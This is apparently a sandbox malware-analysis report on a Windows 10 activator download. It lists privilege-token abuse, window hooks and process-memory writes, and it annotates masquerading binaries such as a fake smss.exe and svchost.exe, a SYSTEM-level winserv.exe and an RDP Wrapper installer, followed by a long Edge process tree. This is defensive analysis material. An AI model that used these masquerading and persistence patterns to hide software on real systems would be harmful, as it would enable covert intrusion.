Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process (repeated entries collapsed)
1188 msedge.exe (×8)
468 msedge.exe (×2)
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
"Token: 33" and "Token: 35" are privilege LUIDs the report did not resolve to names: 33 is SeIncreaseWorkingSetPrivilege and 35 is SeCreateSymbolicLinkPrivilege, both routine for an archiver (7-Zip requests the latter when extracting). The archiver and AUDIODG entries are ordinary. The ones that matter are SeDebugPrivilege in winserv.exe (PID 6072), powershell.exe (PID 4020) and RDPWinst.exe (PID 3240, the RDP Wrapper installer's file name), and SeTcbPrivilege together with SeTakeOwnershipPrivilege in winserv.exe (PID 5128): an administrator's token does not hold SeTcbPrivilege by default, so that instance is already running as SYSTEM.
description pid Process
Token: SeRestorePrivilege 2120 7zFM.exe
Token: 35 2120 7zFM.exe
Token: SeSecurityPrivilege 2120 7zFM.exe
Token: SeSecurityPrivilege 2120 7zFM.exe
Token: 33 1316 AUDIODG.EXE
Token: SeIncBasePriorityPrivilege 1316 AUDIODG.EXE
Token: SeRestorePrivilege 5576 7zaxxx.exe
Token: 35 5576 7zaxxx.exe
Token: SeSecurityPrivilege 5576 7zaxxx.exe
Token: SeSecurityPrivilege 5576 7zaxxx.exe
Token: SeRestorePrivilege 1544 7zaxxx.exe
Token: 35 1544 7zaxxx.exe
Token: SeSecurityPrivilege 1544 7zaxxx.exe
Token: SeSecurityPrivilege 1544 7zaxxx.exe
Token: SeDebugPrivilege 4020 powershell.exe
Token: SeDebugPrivilege 6072 winserv.exe
Token: SeTakeOwnershipPrivilege 5128 winserv.exe
Token: SeTcbPrivilege 5128 winserv.exe
Token: SeTcbPrivilege 5128 winserv.exe
Token: SeDebugPrivilege 3240 RDPWinst.exe
Token: SeAuditPrivilege 2116 svchost.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process (repeated entries collapsed)
1188 msedge.exe (×64)
-
Suspicious use of SendNotifyMessage 3 IoCs
pid Process
4712 GSetup.exe (×3)
-
Suspicious use of SetWindowsHookEx 34 IoCs
The hooks set by the installers, archivers and activator binaries are ordinary GUI behaviour. The entries to look at are smss.exe (PID 1968) and svchost.exe (PID 5740): the genuine Session Manager installs no window hooks and a real service host running in session 0 has no reason to, so these are dropped binaries reusing system-process names (the same smss.exe appears in the processor-information, registry-class and WMI-path hits above). winserv.exe is notable for running as four separate instances.
pid Process (repeated entries collapsed)
2560 KMSTools Lite.exe
2936 KMSTools Lite.exe
344 KMSTools Lite.exe
4264 KMSTools Lite.exe
4712 GSetup.exe
5232 install.exe
5576 7zaxxx.exe
1300 W10DigitalActivation.exe
1748 KMS.exe
5544 update.exe
1544 7zaxxx.exe
2748 Office Installer+_x64.exe
476 win.exe
5740 svchost.exe
5132 IP.exe
1968 smss.exe
6072 winserv.exe (×5)
5128 winserv.exe (×4)
3240 RDPWinst.exe
3728 winserv.exe (×4)
3620 winserv.exe (×4)
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target (repeated entries collapsed; 64 entries in total, all from the Edge browser process)
PID 1188 wrote to memory of 5596 1188 msedge.exe 81 (×2)
PID 1188 wrote to memory of 5152 1188 msedge.exe 82 (×2)
PID 1188 wrote to memory of 1676 1188 msedge.exe 83 (×51)
PID 1188 wrote to memory of 4272 1188 msedge.exe 84 (×9)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
Every process in this part of the tree is Microsoft Edge itself: the browser process (PID 1188) that opened the URL and its crashpad, network, storage, GPU, renderer and utility children, including the unzip.mojom.Unzipper instances behind the SystemTemp file drops listed above. The quarantine.mojom.Quarantine utility (PID 3524) is the helper that tags a finished download with its Zone.Identifier, so its appearance marks a completed download. The sample's own binaries (KMSTools Lite.exe, winserv.exe, RDPWinst.exe and the other names in the signatures above) are not among these processes. The digit that preceded the arrow in the original rendering is the process-tree depth and is shown here as "depth N".
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1, PID 1188)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/
  - Loads dropped DLL
  - Drops file in Windows directory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5596)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x300,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5152)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 1676)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2272,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4272)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2408,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5576)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4544)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2792)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5092,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5568)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3688)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4800,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (depth 2, PID 1756)
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (depth 2, PID 4668)
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3108)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3968)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5224,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5668)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4652)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=4812,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5736)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4888)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5540)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6584,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 1344)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5964,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4476)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6316,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4384)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5468)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 828)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4836,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 4500)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3280,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 5480)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5004,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3772)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 1008)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6816,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2844)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5828,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3524)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3568,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 2216)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 764)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5468,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2, PID 3352)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6840,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:82⤵PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3376,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:12⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5368,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window2⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:468 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x28c,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f2203⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:33⤵PID:5268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2608,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:23⤵PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2296,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=3224 /prefetch:83⤵PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4228,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:83⤵PID:1288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4376,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:13⤵PID:324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:83⤵PID:2744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:83⤵PID:2396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4728,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:13⤵PID:3800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:83⤵PID:3192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:83⤵PID:2544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:83⤵PID:2908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:83⤵PID:2504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5776,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:83⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4972,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:83⤵PID:216
-
-
